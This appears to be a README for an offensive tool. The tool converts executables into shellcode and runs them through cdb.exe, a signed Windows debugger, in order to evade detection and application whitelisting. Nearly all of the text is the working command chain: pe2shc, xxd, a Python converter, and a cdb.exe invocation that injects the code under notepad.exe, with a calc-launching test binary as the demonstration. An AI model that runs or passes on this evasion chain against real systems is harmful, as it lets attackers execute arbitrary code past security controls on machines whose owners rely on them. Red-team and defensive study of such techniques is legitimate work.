This tool will convert shellcode generated using pe_to_shellcode to cdb format. Cdb.exe is a LOLBIN which can help evade detection & application whitelisting. More information can be found about it in my blog post.
- pe_to_shellcode
- xxd
# Generates executable.shc.exe
pe2shc.exe <executable>
xxd -i executable.shc.exe > temp.out
# Generates out.wds
python cdb.py -f temp.out
cdb.exe -pd -cf out.wds -o notepad.exe
The test.exe binary launches calc.exe.
- I had some issues making it work on some executables. Be aware of this in case you face problems.
- Each executable will have a different number of breakpoints. Append 'g' to out.wds as many times as necessary to automatically continue when a breakpoint is hit.